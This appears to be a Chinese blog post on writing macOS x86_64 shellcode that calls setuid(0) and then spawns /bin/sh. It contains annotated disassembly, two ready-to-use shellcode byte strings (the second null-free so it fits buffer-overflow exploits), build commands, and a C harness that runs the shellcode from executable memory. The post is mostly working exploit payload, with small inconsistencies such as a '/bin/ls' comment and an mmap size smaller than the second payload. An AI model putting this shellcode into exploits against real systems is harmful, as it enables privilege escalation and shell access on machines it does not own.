00007ffe50c1d000 4989C4 mov r12, rax
; /bin/sh 地址
00007ffe50c1d003 4983C421 add r12, 0x21
; setuid = 0x17
00007ffe50c1d007 B817000002 mov eax, 0x2000017
; uid = 0
00007ffe50c1d00c 4831FF xor rdi, rdi
; setuid(0)
00007ffe50c1d00f 0F05 syscall
; execve = 0x3b
00007ffe50c1d011 B83B000002 mov eax, 0x200003b
; /bin/sh 地址
00007ffe50c1d016 4C89E7 mov rdi, r12
; 0
00007ffe50c1d019 4831F6 xor rsi, rsi
; 0
00007ffe50c1d01c 4831D2 xor rdx, rdx
; execve("/bin/ls”,0,0);
00007ffe50c1d01f 0F05 syscall
00007ffe50c1d021 db 0x2f ; '/'
00007ffe50c1d022 db 0x62 ; 'b'
00007ffe50c1d023 db 0x69 ; 'i'
00007ffe50c1d024 db 0x6e ; 'n'
00007ffe50c1d025 db 0x2f ; '/'
00007ffe50c1d026 db 0x73 ; 's'
00007ffe50c1d027 db 0x68 ; 'h'
00007ffe50c1d028 db 0x00 ; '.'char shellcode[] = "\x49\x89\xc4\x49\x83\xc4\x21\xb8\x17\x00\x00\x02\x48\x31\xff" \ "\x0f\x05\xb8\x3b\x00\x00\x02\x4c\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f" \ "\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00"
otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 setuid ➜ Desktop git:(master) ✗ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 setuid _setuid: 0000000000017948 movl $0x2000017, %eax ## imm = 0x2000017 000000000001794d movq %rcx, %r10 0000000000017950 syscall 0000000000017952 jae 0x1795c 0000000000017954 movq %rax, %rdi 0000000000017957 jmp 0x11c53 000000000001795c retq 000000000001795d nop 000000000001795e nop 000000000001795f nop
这段不能用在缓冲区溢出里面,因为存在0
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
这里有几段好的:
编译改为如下:
/usr/local/bin/nasm -f macho64 setuid_shell_x86_64.asm ld -static -macosx_version_min 10.9.0 -arch x86_64 setuid_shell_x86_64.o 执行: ./a.out 查看: otool -t a.out
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05";
// C测试代码
int main(int argc, char **argv) {
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}
发表评论